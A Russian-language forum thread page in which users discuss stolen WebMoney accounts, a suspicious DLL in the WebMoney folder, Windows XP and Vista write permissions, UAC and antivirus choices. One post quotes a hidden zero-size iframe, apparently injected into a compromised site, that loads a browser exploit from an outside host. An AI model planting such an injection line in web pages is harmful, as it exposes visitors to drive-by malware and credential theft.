У кого украли Webmoney и доступ к ним - давайте разберемся наконец-то?

beginerx
На сайте с 13.07.2009
Offline
173
#741
Слэш:
C:\Program Files\WebMoney\inetmib1.dll

Версия виндов Windows XP SP2 ?

В SP3 вроде как в Program Files молча уже ничего записать нельзя даже под админом (погорячился...)!

А также опять вопрос

1. зачем работать под админом?

2. почему Касперский а не Avast у которого есть ф-ия запрета записи dll на диск?

3. Лиса?

>>>Скорость и Реакция<<< (https://vk.com/app4629907 ): онлайн тренировка скорости и времени реакции.... (https://vk.com/app4612117 )... (https://vk.com/club18740762 ).
LEOnidUKG
На сайте с 25.11.2006
Offline
1774
#742

крутотень! 75 страниц туфты! Молодцы парни лабайте дальше.

LEOnidUKG добавил 02.04.2010 в 14:25

beginerx:
В SP3 вроде как в Program Files молча уже ничего записать нельзя даже под админом!

Это как? т.е. если я буду копировать файл ctrl+c ctrl+v он у меня какой-то вопрос будет задавать? требовать смс отправить? 😂

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
beginerx
На сайте с 13.07.2009
Offline
173
#743

он скажет нет прав. Права на запись туда остались только у службы инсталятора msi

Хотя возможо погорячился, спутал с Юзером, сейчас поставлю лицензию XP SP2 обновлю до SP3 и проверю, не левой сборке это так, но не факто что под лицензией. Но Avast железно блокирует запись исполняемых, точно помню проверял на XP SP2 SP3 Vista

Да LEOnidUKG прав, лицензия XP SP3 ничего не спрашивает, жесть, ну и дыра эта XP. Vista для записи в програм файлс спрашивает подтверждения прав админа даже если юзер и есть админ (UAC). Т.е. под вистой в папку вебманей левый длл не запихать...

_vb_
На сайте с 25.07.2009
Offline
104
#744
hectorix:
urod.ru скорее всего содержал сплоит, процентов на 90% я уверен что хапнул именно оттуда

добавил......

вот что там висит щас

<noindex><iframe src="http://trfistb.info/for.cgi?tank" width="0" height="0" style="visibility: hidden;"></iframe></noindex>


Нормально?

угу, оно. бился в ограниченном аккаунте, как тигр в клетке. мозилу мне подвесил. если б умел привилегии повышать - полностью бы овладел той виртуальной машинкой, где запускался :)

Саратовская фракция серча (). Давайте посчитаемся.
beginerx
На сайте с 13.07.2009
Offline
173
#745

а тело удалось посмотреть? интересно какие дыры в лисе используются?

Сам не рискнул... :-O

LEOnidUKG
На сайте с 25.11.2006
Offline
1774
#746
beginerx:
Да LEOnidUKG прав, лицензия XP SP3 ничего не спрашивает, жесть, ну и дыра эта XP. Vista для записи в програм файлс спрашивает подтверждения прав админа даже если юзер и есть админ (UAC). Т.е. под вистой в папку вебманей левый длл не запихать...

Это сработает, если на рут стоит пароль, иначе дохлый номер. Да и вырубают люди этот UAC поголовно, я один из них 🤪

_vb_
На сайте с 25.07.2009
Offline
104
#747
beginerx:
а тело удалось посмотреть? интересно какие дыры в лисе используются?

А смысл его рассматривать? Завтра-послезавтра оно уже другое будет. Оно живет в до тех пор, пока онлайновая проверка не покажет его наличие в основных антивирусных базах. Там ведь конвейер, почище чем конвейер по выпечке ГС.

Симантек правда ругнулся, но как-то невнятно.

H
На сайте с 01.04.2010
Offline
12
#748

каким образом можно повлиять на этого пи*ара что хостит ифрейм а также дальше по цепочке? есть возможность стукнуть куда нужно? отдел К или еще что?

Hoodie
На сайте с 27.11.2008
Offline
98
#749
LEOnidUKG:
Да и вырубают люди этот UAC поголовно, я один из них

На Windows 7 UAC вполне вменяемый.

IS
На сайте с 16.08.2006
Offline
160
#750
Hoodie:
На Windows 7 UAC вполне вменяемый.

Подтверждаю, Windows 7 х64 - абсолютно не напрягает. Ну кликнешь раз в день на предупреждение. Конечно, если не являешься тестировщиком программ и переставляешь их многократно.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий